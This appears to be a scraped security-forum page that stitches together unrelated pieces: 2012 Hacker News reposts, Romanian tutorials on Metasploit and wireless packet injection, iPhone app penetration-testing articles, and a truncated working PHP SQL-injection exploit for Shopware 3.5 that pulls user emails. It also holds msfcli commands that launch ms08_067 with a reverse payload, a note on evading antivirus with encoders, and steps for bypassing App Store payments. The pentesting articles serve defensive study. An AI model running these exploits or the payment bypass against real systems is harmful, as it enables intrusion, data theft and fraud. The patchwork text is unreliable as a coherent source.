Wubi

Obama will control internet, signs Emergency Internet Control Posted On 7/18/2012 12:36:00 AM By THN Security Analyst Barack Obama has signed an executive order that could hand control of the internet to the U.S. Government, in the event of a natural disaster or terrorist attack. "The federal government must have the ability to communicate at all times and under all circumstances to carry out its most critical and time sensitive missions," Obama said. President Obama adds that it is necessary for the government to be able to reach anyone in the country during situations it considers critical, writing, “Such communications must be possible under all circumstances to ensure national security, effectively manage emergencies and improve national resilience.” Later the president explains that such could be done by establishing a “joint industry-Government center that is capable of assisting in the initiation, coordination, restoration and reconstitution of NS/EP [national security and emergency preparedness] communications services or facilities under all conditions of emerging threats, crisis or emergency.” But Section 5.2 has raised alarm among those who fear the government will have too much control over the Web. The section explained how the secretary of homeland security - currently Janet Napolitano - will 'satisfy priority communications requirements through the use of commercial, Government, and privately owned communications resources, when appropriate.' White House officials have acted quickly to ease concern, insisting the order is just an update of an existing authority dating back to 1984 . The claim the government has been granted no extra powers. How threatening Obama's new executive powers are is subject to debate. Please pass your feedback in Comments. Obama will control internet, signs Emergency Internet Control : The Hacker News ~ http://thehackernews.com/2012/07/obama-will-control-internet-signs.html

Termenii Metasploit MSFconsole MSFcli Armitage MSFpayload MSFencode Metasploit e un tool valoros in pen testing, ce poate deveni destul de confuz pentru un incepator. Tutorialul asta despre metasploit te va ajuta sa rulezi metasploit. Probabil ca multe dintre tintele tale vor fi sisteme ce ruleaza pe Windows. Daca esti interesat, recomand sa citesti, Amazon.com: Metasploit: The Penetration Tester's Guide (9781593272883): David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharoni: Books O carte ce iti va arata cele mai multe dintre framework-urile metasploit, ce te lasa sa descoperi singur adevarata "putere" a metasploit. In orice caz, chiar o recomand. 1. Termenii Metasploit Exploit - sa profiti de o bresa de securitate, in cadrul unui sistem, retea sau aplicatie. Payload - este codul pe care computerul victimei il va executa in framework-ul metasploit. Module - o mica parte de cod ce poate fi adaugata la framework-ul metasploit pentru a executa un atac. Shellcode - o mica parte de cod folosita ca payload. 2. MSFConsole Msfconsole este o interfata cu majoritatea caracteristicilor din metasploit. Msfconsle poate fi folosita pentru a porni atacuri, crearea de "listen-eri", si multe, multe altele. Vom folosi Msfconsole pe parcursul acestui tutorial. Metasploit vine instalat implicit pe backtrack 5. Pentru a accesa msfconsole, deschde terminalul si scrie: root@bt:~# cd /opt/metasploit/msf3 root@bt:/opt/metasploit/msf3# msfconsole Daca ai nevoie de ajutor, pentru a vedea fisierele "help", pur si simplu scrie help urmat de comanda despre care vrei sa afli mai multe. In cazul nostru, vrem sa aflam mai multe despre comanda connect. Aceasta ne permite sa comunicam cu un host. msf > help connect 3. MSFcli MSFcli este o alta cale de a accesa framework-ul metasploit dar se concentreaza mai mult pe scripting si interpretabilitate. Pentru a vedea mai multe despre msfcli: root@bt:~# cd /opt/metasploit/msf3 root@bt:/opt/metasploit/msf3# msfcli -h Acum sa-i facem un mic "test drive" la msfcli. Poti vedea optiunile intr-un modul adaugand litera O la sfarsit de linie. Spre exemplu: root@bt:/opt/metasploit/msf3# msfcli windows/smb/ms08_067_netapt o Acest modul are nevoie de 3 optiuni: RHOST, RPORT, si SMPIPE. Adaugand P la sfarsit ne permite sa vedem ce payloads putem folosi. root@bt:/opt/metasploit/msf3# msfcli windows/smb/ms08_067_netapi RHOST=184.22.212.191 P Putem rula exploit-ul nostru selectand un payload, inserand optiunile, si rulandu`l punand litera E la sfarsit ca msfcli argument string. root@bt:/opt/metasploit/msf3# msfcli windows/smb/ms08_067_netapi RHOST=184.22.212.191 PAYLOAD=windows/vncinject/reverse_tcp_dns E Nota: IP-ul selectat ca RHOST este un VPS ce ruleaza pe Windows Server. Acesta va reactiona ca sistemul victimei, pentru teste. Vei fi nevoit sa faci la fel, cu un alt computer sau masina virtuala. Pentru "antrenament", nu actualiza sistemul victimei, sau nu insta un antivirus. 4. Armitage 1. Ruleaza comanda armitage 2. Selecteaza Start MSF. Are GUI. 5. MSFpayload Componenta msfpayload a metasploit ce genereaza shellcode, si executa. Shellcode poate fi generat in mai multe feluri cum ar fi C, Ruby, JavaScript si chiar Visual Basic. Fiecare dintre acestea poate fi folositor in diverse situatii. Pentru ajutor in msfpayload poti scrie: root@bt~# msfpayload -h Precum msfcli, daca ai nevoie sa gasesti optiunile necesare, pune la sfarsitul liniei litera O. root@bt:~# msfpayload windows/shell_reverse_tcp O 6. MSFencode Shellcode-ul generat de msfpayload este functional, dar contine o gramada de caractere null care atunci cand sunt interpretate de majoritatea dintre programe, semnifica sfarsitul unui string, si asta va provoca codul pentru a termina inainte de compilare. In plus, shellcode-ul traverseaza o retea in cleartext ce paote fi preluat de sistemele de detectare a intruziunilor(IDSs) si programele antivirus. Pentru aceasta problema, dezvoltatorii Metasploit ofera msfencode, ce te ajuta sa eviti caracacterele defectuase si sa evite antivirusul si IDS-ul codificand payload-ul initial intr-un mod in care nu contine " "bad" characters ". Scrie, msfencode -h pentru o lista cu optiunile msfencode. Metasploit contine un numar de diferite encodari pentru situatii diferite. Unele vor fi folositoare can poti folosi numai caractere alfanumerice ca parte din payload, cum este in cazul formatului multor fisier sau alte aplicatii ce accepta numai caractere printabile ca input. Un foarte popular si bine cunoscut encoder este: x86/shikata_ga_nai. Pentru o lista cu encoderele disponibile, scrie, root@bt:~# msfencode -l Referinte Main Page - BackTrack Linux BackTrack Tutorials

Packet Sniffing si Injecting Frame-urile WLAN: Administrarea frame-urilor: Administrarea frame-urilor este responsabila cu mentinerea comunicarii intre punctele de acces si clientii wireless. Controlul frame-urilor: Controlul frame-urilor este responsabil cu mentinerea unui schimb adecvat de date intre punctul de acces si clientii wireless. Data frame: Transporta datele actuale trimise in reteaua wireless. Acolo nu exista sub-tipuri pentru data frame. Packet Sniffing folosind Wireshark Deschide wireshark din meniu, sau scrie "wireshark" in consola. In meniu il puteti gasi in Application>BackTrack>Information Gathering>Network Analysis>Network Traffic Analysis>wireshark Odata ce s-a deschis WireShark apasa pe "Interface List". O alta fereastra se va deschide cu o lista de interfete ce pot captura packete. Nota: Eu am setat pe mon0. Click pe start, si WireShark va incepe sa captureze packete. Acelea sunt packetele wireless pe care placa wireless le sniff-eaza(n`am gasit alt cuvant). Acum haideti sa scanam packetele de la propriul nostru punct de acces. Pentru a face asta, vom folosi airodump-ng. Airodump-ng este folosit sa captureze packetele wireless ce folosesc WEP encryption in idea ca vei folosi aircrack-ng.(il voi folosi intr-un tutorial cu alta ocazie). Dar, de data asta, haideti sa dezactivam encryption-ul acces point-ului nostru. Acum intra in terminal si scrie: airodump-ng --bssid 00:D9:98:6A:85:b0 mon0[code][i]Nota:[/i] 00:D9:98:6A:85:b0 este adresa MAC a acces point-ului [b]meu[/b]. Pentru a`l gasi pe al tau, in terminal,[code]ifconfig -aDupa ce airodump-ng termina, vei vedea acces point-ul tau cu canalul pe care ruleaza. Acum trebuie sa blocam pe acces point-ul nostru setand placa wireless pe canalul punctului de acces. Pentru asta, root@bt:~# iwconfig mon0 channel 6Unde "6" este canalul acces point-ului). Acum sa revenim la wireshark. Scrie in filter box, wlan.bssid == ADRESA TA MAC) && (wlan.fc.type_subtype == 0×20 Acum vom "sniff-a" numai packetele de la acces point-ul nostru. Packet Injecting Prima data, vrem sa vedem doar packetele non-beacon in wireshark. Dechi deschide wireshark si scrie in filter box: bssid == ADRESA TA MAC) && !(wlan.fc.type_subtype == 0×08).Apoi deschide terminalul si scrie aireplay-ng -9 -e "Wubi" -a ADRESA TA MAC mon0Nota: Inlocuieste Wubi cu numele SSID-ului tau. Acum, daca te intorci la wireshark, ar trebui sa vezi cateva packete care au fost injectate. Acelea sunt doar packete la intamplare ce nu au vreun efect real. Referinte Main Page - BackTrack LinuxBacktrack Tutorials

Decrypteaza asta: 95cedfbe9c3f11cfc59187ee12ddc5111b4e1895 Cryptat in MD5>Base64>SHA1.

Android Security shielded with full ASLR implementation Posted On 7/17/2012 11:49:00 PM By THN Security Analyst The latest release of Google's Android mobile operating system has finally been properly fortified with an industry-standard defense. It's designed to protect end users against hack attacks that install malware on handsets. Android 4.1 Jelly Bean includes several new exploit mitigations and a more extensive implementation of ASLR to help defeat many kinds of exploits. ASLR is an exploit mitigation method that randomizes the positions of key data areas such as libraries, heap, stack, and the base... Android Security shielded with full ASLR implementation : The Hacker News ~ http://thehackernews.com/2012/07/android-security-shielded-with-full.html

In the first part of this thread, we discussed the iPhone application traffic analysis. In this part, we will take a look at the privacy issues and the application local data storage. Privacy issues Every iPhone has an associated unique device Identifier derived from a set of hardware attributes called UDID. UDID is burned into the device and one cannot remove or change it. However, it can be spoofed with the help of tools like UDID Faker. UDID of the latest iPhone is computed with the formula given below - UDID = SHA1(Serial Number + ECID + LOWERCASE (WiFi Address) + LOWERCASE(Bluetooth Address)) UDID is exposed to application developers through an API which would allow them to access the UDID of an iPhone without requiring the device owner’s permission. The code snippet shown below is used to collect the UDID of a device, later which can used to track the user’s behavior. NSString *uniqueIdentifier = [device uniqueIdentifier] Current research shows that, with the help of UDID, it is possible to observe the user’s browsing patterns and trace out the user’s geo location. As it is possible to locate the user’s exact location with the help of a device UDID, it became a big privacy concern. More possible attacks are documented in Eric Smith-iPhone application privacy issues whitepaper. Eric’s research shows that 68% of applications silently send UDIDs to the servers on the internet. A perfect example of a serious privacy security breach is social gaming network Openfient. Openfient collected device UDID’s and misused them by linking it to real world user identities (like email address, geo locations latitude & longitude, Facebook profile picture) and making them available for public access, resulting in a serious privacy breach. More details about this security breach are documented at this link. While penetration testing, observe the network traffic for UDID transmission. UDID in the network traffic indicates that the application is collecting the device identifier or might be sending it to a third party analytic company to track the user’s behaviour. In iOS 5, Apple has deprecated the API that gives access to the UDID, and it will probably remove the API completely in future iOS releases. Development best practice is not to use the API that collects the device UDIDs, as it breaches the privacy of the user. If the developers want to keep track of the user’s behaviour, create a unique identifier specific to the application instead of using UDID. The disadvantage with the application specific identifier is that it only identifies an installation instance of the application, and it does not identify the device. Apart from UDID, applications may transmit personal identifiable information like age, name, address and location details to third party analytic companies. Transmitting personal identifiable information to third party companies without the user’s knowledge also violates the user’s privacy. So, during penetration testing carefully observe the network traffic for the transmission of any important data. Example: Pandora application was used to transmit user’s age and zip code to a third party analytic company (doubleclick.net) in clear text. For the applications which require the user’s geo location (ex: check-in services) to serve the content, it is always recommended to use the least degree of accuracy necessary. This can be achieved with the help of accuracy constants defined in core location framework (ex: CLLocationAccuracy kCLLocationAccuracyNearestTenMeters). Local data storage Mobile applications store the data locally on the device to maintain essential information across the application execution or for a better performance or offline access. Also, developers use the local device storage to store information such as user preferences and application configurations. As device theft is becoming an increasing concern, especially in the enterprise, insecure local storage is considered to be the top risk in mobile application threats. A recent survey conducted by Viaforensics revealed that 76 percent of mobile applications are storing user’s information on the device. 10 percent of them are even storing the plain text passwords on the phone. Sensitive information stored on the iPhone can be obtained by attackers in several ways. A few of the ways are listed below - From Backups When an iPhone is connected to iTunes, iTunes automatically takes a backup of everything on the device. Upon backup, sensitive files will also end up on the workstation. So an attacker who gets access to the workstation can read the sensitive information from the stored backup files. Physical access to the device People lose their phones and phones get stolen very easily. In both cases, an attacker will get physical access to the device and read the sensitive information stored on the phone. The passcode set to the device will not protect the information as it is possible to brute force the iPhone simple passcode within 20 minutes. To know more details about iPhone passcode bypass go through the iPhone Forensics article available at – InfoSec Resources – iPhone Forensics. Malware Leveraging a security weakness in iOS may allow an attacker to design a malware which can steal the files on the iPhone remotely. Practical attacks are demonstrated by Eric Monti in his presentation on iPhone Rootkit? There’s an App for That! . iPhone application directory structure: In iOS, applications are treated as a bundle represented within a directory. The bundle groups all the application resources, binaries and other related files into a directory. In iPhone, applications are executed within a jailed environment (sandbox or seatbelt) with mobile user privileges. Unlike Android UID based segregation, iOS applications runs as one user. Apple says “The sandbox is a set of fine-grained controls limiting an application’s access to files, preferences, network resources, hardware, and so on. Each application has access to the contents of its own sandbox but cannot access other applications’ sandboxes. When an application is first installed on a device, the system creates the application’s home directory, sets up some key subdirectories, and sets up the security privileges for the sandbox“. A sandbox is a restricted environment that prevents applications from accessing unauthorized resources; however, upon iPhone JailBreak, sandbox protection gets disabled. When an application is installed on the iPhone, it creates a directory with a unique identifier under /var/mobile/Applications directory. Everything that is required for an application to execute will be contained in the created home directory. Typical iPhone application home directory structure is listed below. In iPhone, applications might store the information in any of the locations listed below. Plist files Keychain Application’s home directory Cache Logs Plist files: Property List is a structured binary formatted file which contains the essential configuration of a bundle executable in nested key value pairs. Plist files are used to store the user preferences and the configuration information of an application. For example, Gaming applications usually store game levels and game scores in the Plist files. In general, applications store the Plist files under [Application's Home Directory]/documents/preferences folder. Plist can either be in XML format or in binary format. As XML files are not the most efficient means of storage, most of the applications use binary formatted Plist files. Binary formatted data stored in the Plist files can be easily viewed or modified using Plist editors (ex: plutil). Plist editors convert the binary formatted data into an XML formatted data, later it can be edited easily. Plist files are primarily designed to store the user preferences & application configuration; however, the applications may use Plist files to store clear text usernames, passwords and session related information. So, while penetration testing, view all the Plist files available under application’s home directory and look for sensitive information, like usernames, passwords, user’s personal information and session cookies, etc… Developers can assign any extension to the Plist files. A Plist file can be easily identified by looking at the file contents using cat command. The content of a Plist file starts with bplist’. Along with the sensitive information storage, application may also take authentication & authorization decisions based on the values stored in Plist files. For example, if you notice a Plist entry like admin=0 during penetration testing, change the admin key value to 1 and open the application. If the application does not validate the user input properly and takes the authorization decision based on the Plist entry, you may log into the application as an administrator. Development best practice is to not store any sensitive information in Plist files. Also, do not take authentication & authorization decisions based on the information stored in Plist files. Plist files contain user controlled input, and it should be validated properly like any other user input. WordPress iPhone application used to store clear text username and password in a Plist file. The video below here demonstrates the WordPress vulnerability. This vulnerability was reported by SANS and WordPress fixed it immediately. Plist files can be viewed and modified easily on both the JailBroken and non JailBroken iPhones. The examples listed below illustrate the various ways of editing Plist files on the both JailBroken and non JailBroken devices. Tampering Plist files on a non JailBroken iPhone: On a non JailBroken iPhone, Plist files can be viewed & modified using tools like iExplorer and iBackupBot. Modifying Plist entries with iExplorer iExplorer (formerly iPhone Explorer) gives access to the iPhone in disk mode and allows browsing all the folders on the iPhone directly. Stick Cricket iPhone game is used for the demo. Stick Cricket iPhone game stores the game score in a Plist file under application’s home directory. As the application is storing the game score locally in a Plist file, it can be altered by editing the Plist file. Screenshot shown below displays the actual score before the Plist modification. Steps shown below will demonstrate the usage of iExplorer tool to modify the game scores stored in the Plist file - On your workstation download and install iExplorer. Connect the iPhone to the workstation over USB. In iExplorer, browse to Apps->com.sticksports.stickcricket folder. 4. Navigate to stick cricket Library->Preferences folder. 5. Copy com.sticksports.stickcricket.Plist file to the workstation by dragging it to the desktop. 6. On the workstation, open the Plist file using a Plist editor and modify the yourBest5Overs key value. For this demo, I have modified the value to 180 from 30 and saved the Plist file. 7. From iExplorer, delete the com.sticksports.stickcricket.Plist on the iPhone and drag the newly saved file onto the iPhone. 8. In iPhone, terminate the Stick Cricket application and reopen it. The Stick Cricket welcome screen now displays the modified score as shown in the screenshot below. Modifying Plist entries with iBackupBot When the iPhone is connected to a computer, iTunes takes a backup of everything on the phone including configuration files (Plist files). iBackupBot tool can be used to view and modify the Plist file entries on the iPhone backup and restore the modified backup onto the iPhone.. Steps shown below will demonstrate the use of iBackupBot tool to modify the game scores stored in the Plist file - Connect the iPhone to the workstation over USB cable. On Workstation, open iTunes and take a backup of the iPhone. Close iTunes. Open iBackupBot. It automatically identifies the existing backups and displays the files inside the backup to the user. Click on Stick Cricket and open /Library/Preferences/com.sticksports.stickcricket.Plist file. Modify the score stored in the Plist file. Click on Export icon to save the modified Plist file. Click the restore icon in iBackupBot toolbar. It will restore the iPhone with the modified backup. Now on iPhone, reopening the Stick Cricket game will display the modified score. Tampering Plist files on a JailBroken iPhone: On a JailBroken iPhone, Plist files can be viewed & modified using tools like plutil and iFile. Both these tools can be downloaded from Cydia (packages – com.eric.tool & iFile). iFile would allow to modify the Plist files directly on the iPhone. The iPhone camera application is used for the demo. In iOS camera application, Apple has hidden the panorama mode feature and planned to include this feature in future iOS versions. Panorama mode basically allows the users to take continuous photos while panning the camera from left to right. Apple stored the panorama mode switch in a Plist file. iOS hackers Conard & Chpwn exposed the panorama mode in iOS 5 by modifying an entry in com.apple.mobileslideshow.Plist file. Screenshot shown below displays the list of options available in the iPhone camera application. Steps shown below will demonstrate the usage of plutil tool to change the panorama switch stored in the Plist file - SSH to the iPhone and login as a root user (password: alpine). Navigate to /private/var/mobile/Library/Preferences/ directory. View com.apple.mobileslideshow.Plist file content with the help of plutil tool. > Plutil [I]com.apple.mobileslideshow.plist[/I] Add ‘EnableFirebreak’ key to the com.apple.mobileslideshow.plist file with the below command. > Plutil –key EnableFirebreak –value yes com.apple.mobileslideshow.plist It turns on the panorama feature in the iPhone camera application. Screenshot below shows different options available in the iPhone camera after the modification- Penetration Testing for iPhone Applications is going to be covered in a series of articles. Part 3 will cover the keychain data storage and error log analysis. References InfoSec Resources

Ah, n`am vazut. Sa`l stearga cineva atunci pe asta.

This article focuses specifically on the techniques and tools that will help security professionals understand penetration testing methods for iPhone applications. It attempts to cover the entire application penetration testing methodology on a physical device (running with iOS 5) rather than a simulator. Background: Since the introduction of the iPhone, Apple has sold more than 110 million iPhones. The smartphone platform has created a new business and companies want to make their services available on mobile devices in order to reach out to users very quickly and easily. The iPhone has enough power and performance to do most of the stuff you can do on a laptop and span a range of categories from education and productivity to games and entertainment. The iPhone provides developers with a platform to develop two types of applications. Web based applications – which uses JavaScript, CSS and HTML-5 technologies Native iOS applications- which are developed using Objective-C and Cocoa touch API This article mainly covers the pen testing methodology of native iOS applications. However, some of the techniques explained here can also be used with web-based iOS applications. Application Distribution model: iOS developers use Apple Xcode developer tools and test their applications within the iOS simulator. A simulator simulates an environment but it does not mimic many of the features and functionalities available on real devices. An iOS simulator compiles iOS applications to a local native code which is different from the Android emulator that compiles to ARM instructions. Though simulators allow basic development and testing, it is not sufficient for many applications which require the use of full hardware power, performance and features which are only available on real devices. To test these types of applications on real devices, developers have to subscribe to Apple’s iOS Developer Program because the iPhone is only allowed to run Apple signed applications. Mandatory Code Signing mechanism implemented in iOS requires that all the native code running on the device should be signed by a known or trusted certificate. Upon subscription to the iOS Developers Program, Apple issues a signed provisioning profile that configures the iOS device to permit the execution of code signed by a developer certificate. Developers can apply for this program as an individual, company or university. Based on the provisioning profile, application distribution models are categorized as 5 types. Single device distribution: Development provisioning profiles issued by Apple are tied to a device’s UDID (Unique Device ID). This provisioning profile allows running a developer’s application on the device. As it is tied to a particular device, the provisioning profile does not work on other devices. This model is used during single device testing. Ad Hoc distribution: Ad Hoc provisioning profiles issued by Apple are tied to the UDID’s of up to 100 other devices, including the iPad, iPhone or iPod touch. The developer has to supply the UDID of 100 devices during the subscription process. This model allows developers to test their application on a wide range of devices. In-house distribution: Enterprise provisioning profiles issued by Apple permit the installation of applications on devices without configuring their UDIDs. This distribution is generally used by enterprises to distribute applications internally to their employees. Over the air (OTA) distribution: This model is designed to allow enterprise developers to send applications to individual users in their organization through e-mail or by hosting the application on a web server. The main problem with this kind of distribution is if someone outside the organization gets access to the link then they too can also install the application. App Store distribution This is a centralized mechanism for distributing Apple signed applications. Upon submitting the application to Apple, Apple verifies it against the App Store review guidelines and approves it if the application follows all the review guidelines. After approval, Apple will re-sign the application with an Apple signing certificate and make it available for download in the App Store. Penetration Testing In this section we are going to focus on iOS applications rather than the iPhone operating system itself. Actually there is an overlap between the iPhone OS security and the iPhone application security. So understanding the iOS platform and its security technology will help penetration testers properly assess the security of iPhone applications. The main areas of focus while assessing the security of iPhone applications are - Application traffic analysis Privacy Issues Local Data Storage Caching Reverse Engineering Unmanaged code URL Schemes Push Notifications Setup: A simulator does not provide the actual device environment, so all the penetration testing techniques explained in this article are specific to a physical device. iPhone 4 with iOS 5 will be used for the following demonstrations. To perform pentesting we need to install a few tools on our device. These tools are not approved by Apple. Code signing restrictions in iOS do not allow us to install the required tools on the device. To bypass the code signing restrictions and run our tools we have to JailBreak the iPhone. JailBreaking gives us full access to the device and allows us to run code which is not signed by Apple. After JailBreaking, the required unsigned applications can be downloaded from Cydia. Cydia is a parallel App Store for unsigned applications. JailBreaking puts your phone at great risk to some security vulnerabilities because the device allows any application to run even if it is not approved by Apple. Though we can assess the security of an application on a non-JailBroken iPhone, it is not possible to give complete coverage. JailBreaking makes the pen tester’s work easier and helps to provide full coverage of an application. Tools like Pwnage, readsn0w and greenposi0n can be used to JailBreak the iPhone. Tools required for pentesting: From Cydia, download and install the applications listed below. OpenSSH – Allows us to connect to the iPhone remotely over SSH Adv-cmds : Comes with a set of process commands like ps, kill, finger… Sqlite3 : Sqlite database client GNU Debugger: For run time analysis & reverse engineering Syslogd : To view iPhone logs Veency: Allows to view the phone on the workstation with the help of veency client Tcpdump: To capture network traffic on phone com.ericasadun.utlities: plutil to view property list files Grep: For searching Odcctools: otool – object file displaying tool Crackulous: Decrypt iPhone apps Hackulous: To install decrypted apps iPhone does not give us a terminal to see inside directories. Upon OpenSSH installation on the device, we can connect to the SSH server on the phone from any SSH client (ex:Putty, CyberDuck, WinScp). This gives us flexibility to browse through folders and execute commands on the iPhone. An iPhone has two users by default. One is mobile and the other is a root user. All the applications installed on the phone run with mobile user privileges. But using SSH we can log into the iPhone as a root user, which will give us full access to the device. The default password for both the user accounts (root, mobile) is alpine. Note: Best practice is to change the default SSH passwords of your device. If your phone and the workstation are connected to Wi-Fi, you can directly SSH to the iPhone by typing in the IP address and username/password. SSH to iPhone over Wi-Fi: > ssh root@iPhone-IP> password: alpineIf your phone and the workstation are not on Wi-Fi, you can still do SSH via the USB cable with the help of an iPhone tunnel (which can be downloaded from – iphonetunnel-usbmuxconnectbyport - USB mux TCP tunneling and basic iRecovery functionality without libUSB - Google Project Hosting). SSH to iPhone over USB cable: > ./iphone_tunnel -Iport 2222> ssh -p 2222 root@127.0.0.1Once we have a SSH connection, we can run commands directly on the iPhone. As iOS is a trimmed version of Mac OS , many of the MAC OS commands will work on the iPhone. Application traffic analysis Pen testing iPhone applications isn’t all that different because client-side applications still interact with the server-side components over a network using some protocols. So it also involves network pentesting and web application pentesting. The primary goal in traffic analysis is to capture and analyze the network traffic to find vulnerabilities. iPhone applications may transmit data to the server in any of these communication mechanisms: Clear text transmission, such as httpEncrypted channel, such as httpsCustom protocols or Low level streamsIt’s 2012 and applications are still using clear text transmission protocols like http. In general, mobile applications are more prone to MITM attacks because most people access them over WIFI. An attacker who has access to the same Wi-Fi can run tools like FireSheep and hijack user sessions. As plain text transport protocols are vulnerable to MITM attacks, applications which transmit sensitive data must use encrypted communication protocols like https. During pen testing, observe whether the application is transmitting any sensitive data over the encrypted channel or not. Application traffic can be captured by configuring the proxy settings available in iPhone. Upon setting up a proxy, the iPhone routes its traffic through the configured proxy. Configuring Proxy The screenshots below illustrates the required settings in an iPhone workstation (IP-192.168.1.4) required to capture http application traffic. 1. Navigate to the Settings application 2. Turn on Wi-Fi 3. Choose a network and click on the blue arrow corresponding to it 4.Choose ‘Manual’ and setup a proxy IP (ex: 192.168.1.4) 1. On your workstation, Open Burp Suite and navigate to Proxy->Options, Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’ Now browsing any http website or http application in iPhone routes the traffic to your workstation and will display in Burp Suite.The same proxy settings also work for https traffic as well. But capturing iPhone application https traffic is little tricky. In SSL communication, browser based applications automatically validate the server-side certificate; whereas in native iOS applications, the developer has to explicitly write the code to validate server certificates. Coding mistakes at this point may lead the application to accept any server certificate. When an application fails to validate the server certificate, attackers can use any fake certificate and perform MITM attacks. One common mistake that we see in iPhone application development is the use of allowanyhttpscertificateforhost (NSURLRequest) or continueWithoutCredentialForAuthenticationChalleng e (NSURLConnection) function call. Applications which implement these functions accept any certificate even if it is not issued by the original server. Also the application users do not even get a certificate warning. While pentesting, check whether the application is validating the certificates properly or not. If the application validates server-side certificates properly, then it will display a certificate error message when it receives an invalid certificate. It also does not allow the user to use that application or proceed further with the invalid certificate. To capture the SSL traffic of these applications during pen testing, first we have to add a proxy CA certificate to the iPhone trusted certificates list. Later if the application receives a proxy certificate it will not display any certificate error because we told our iPhone to trust that certificate. This will allow us to capture the https traffic. The same technique is applicable to other protocols which work on certificates. The video below demonstrates the MITM https application traffic. Apart from http and https protocols iPhone applications may also use custom protocols or low level socket communication APIs (NSStreams, CFStreams). The MITM techniques explained above would not work to capture the network traffic of these applications. In order to capture the low level traffic of these applications download and install tcpdump from Cydia on iPhone. Upon installation of tcpdump, connect the iPhone over SSH and run the commands below to capture traffic and write it into a .pcap file. >ssh root@iPhone-IP>password: alpineConnect to the phone using a GUI SSH client like Cyberduck. Browse to the folders and copy the recently created .pcap file to your workstation. Next, open the .pcap file using a traffic capture tool like Wireshark. Use your protocol analyzing skills and identify the custom protocol. The same techniques can be used for the applications which do not respect the iPhone proxy settings. In these cases, DNS spoofing techniques can be used to perform MITM and for traffic capture. Once you capture the traffic, typical web application pen testing attacks are done on the application server. Now you can look for SQL injection, authentication, authorization, session management, cryptography weaknesses and many more web related vulnerabilities. Penetration Testing iPhone Applications is going to be covered in a series of articles. Part 2 will cover privacy issues and local data storage. References InfoSec Resources

App Store bypassed by Russian hacker without jailbreaking Posted On 7/15/2012 08:30:00 AM By THN Security Analyst Apple is investigating yet another security breach in its iTunes app store . A Russian hacker worked out a way that allows people to bypass payment in the App Store and download products for free. The hacker, dubbed ZonD80, posted a video of the crack on YouTube (Deleted by Youtube now) and claims that the technique makes it possible to beat Apple's payment systems by installing a couple of certificates and assigning a specific IP address to the device. The new service, which has already been subject to attempts at shutting it down, requires no jailbreaking and only minimal configuration changes. It works by funneling purchase requests through a server operated by the hacker, rather than the legitimate one offered by Apple. As a result, charges that normally would be applied to a user's account are bypassed. Below are the steps to the hack: Install two certificates: CA and in-appstore.com. Connect via Wi-Fi network and change the DNS to 62.76.189.117. Press the Like button and enter your Apple ID & password. Using the above hack, you are actually stealing in-app purchase content from developers, which is kind of disturbing and is of course against developer’s terms of service. ZonD80 is now asking for donations to set up a website to promote the hack."Why you must to pay for content, already included in purchased app? I think, you must not," he said. Apple has responded with the following statement:“The security of the App Store is incredibly important to us and the developer community,” Apple representative Natalie Harrison. “We take reports of fraudulent activity very seriously and we are investigating.” http://thehackernews.com/2012/07/app-store-bypassed-by-russian-hacker.html

Hacker wanted by FBI held in India For Carding Crimes Posted On 7/15/2012 06:35:00 AM By THN Security Analyst Nikhil Kolbekar, aka HellsAngel, was arrested on July 11 in Mumbai, India. Eric Bogle, known as Swat Runs Train, and Justin Mills, or xTGxKAKAROT, were taken into custody in Canada, respectively Colorado, US. HellsAngel and Bogle is suspected of selling complete credit card details, including names, addresses, social security numbers, birth dates, and bank account information. He also sold remote desktop protocol (RDP) access data that could be utilized to breach computers in countries such as Turkey, India, Czech Republic, Brazil, Germany, France, Italy, Spain, Sweden, and others. The suspect, Nikhil Kolbekar, was produced before the Esplanade Court on Thursday and has been remanded in judicial custody. He will be produced before the Patiala House court in Delhi on July 25, with the US pressing for his extradition through the Interpol. Carding refers to various criminal activities associated with stealing personal identification information and financial information belonging to other individuals including the account information associated with credit cards, bank cards, debit cards, or other access devices and using that information to obtain money, goods, or services without the victims’ authorization or consent. Janice K. Fedarcyk, the assistant director in charge of the New York FBI, said the cross-border law-enforcement operation is targeting "highly organized cyber criminals" and is designed to "root out criminal behavior on the Internet." FBI Assistant Director in- Charge Janice K Fedarcyk said, “These arrests in India, Canada, and the United States as part of Operation Card Shop are just another example that cyber criminals will be stopped even if they cross borders. Operation Card Shop is an international operation aimed at sophisticated, highly organized cyber criminals involved in buying and selling stolen identities, exploited credit cards, counterfeit documents, and sophisticated hacking tools. The FBI and all our law enforcement partners, here and abroad, will continue to root out criminal behavior on the Internet.” The police have seized a computer, hard-disk, CPU, CDs and pen-drives from Kolbekar, which will be used as evidence against him. http://thehackernews.com/2012/07/hacker-wanted-by-fbi-held-in-india-for.html

#!/usr/bin/php <?php # Exploit Title: Shopware 3.5 - SQL Injection # Date: 13.07.2012 # Exploit Author: Kataklysmos # Software Link: http://www.shopware.de/ # Version: 3.5 function http_req($host, $q) { if(!$fs = fsockopen($host, 80)) exit("Could not open HTTP- Connection to ".$host."\r\n\r\n"); $head = "GET /recommendation/bought/article/".urlencode("0 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT (".$q.") FROM `information_schema`.`tables` LIMIT 0,1), FLOOR(RAND(0)*2)) x FROM `information_schema`.`tables` GROUP BY x) z)")." HTTP/1.1\r\n"; $head .= "Host: ".$host."\r\n"; $head .= "Connection: Close\r\n\r\n"; fwrite($fs, $head); $ret = ''; while(!feof($fs)) $ret .= fgets($fs, 4096); fclose($fs); return $ret; } function mask($cont) { if(preg_match('/Duplicate entry \'(.*)1\' for/', $cont, $m)) return $m[1]; else return false; } function space($x) { $r = ''; for($i = 0; $i < $x; $i++) $r .= ' '; return $r; } echo "\r\nExploit Title: Shopware 3.5 - SQL Injection\r\n"; echo "Date: 13.07.2012\r\n"; echo "Exploit Author: Kataklysmos\r\n"; echo "Software Link: http://www.shopware.de/\r\n"; echo "Version: 3.5\r\n\r\n"; if(!isset($argv[2])) { echo " Usage: \r\n"; echo " ".$argv[0]." HOST --auto\r\n"; echo " ".$argv[0]." www.shopwaredemo.de --auto\r\n\r\n"; echo " ".$argv[0]." HOST QUERY\r\n"; echo " ".$argv[0]." www.shopwaredemo.de \"SELECT COUNT(`id`) FROM `s_user`\"\r\n"; echo " ".$argv[0]." www.shopwaredemo.de \"SELECT `email` FROM `s_user` LIMIT 0,1\"\r\n\r\n"; exit(1); } if($argv[2] != '--auto') { $x = http_req($argv[1], $argv[2]); if(!$x = mask($x)) exit("Your query failed!\r\n\r\n"); echo "Query:\r\n 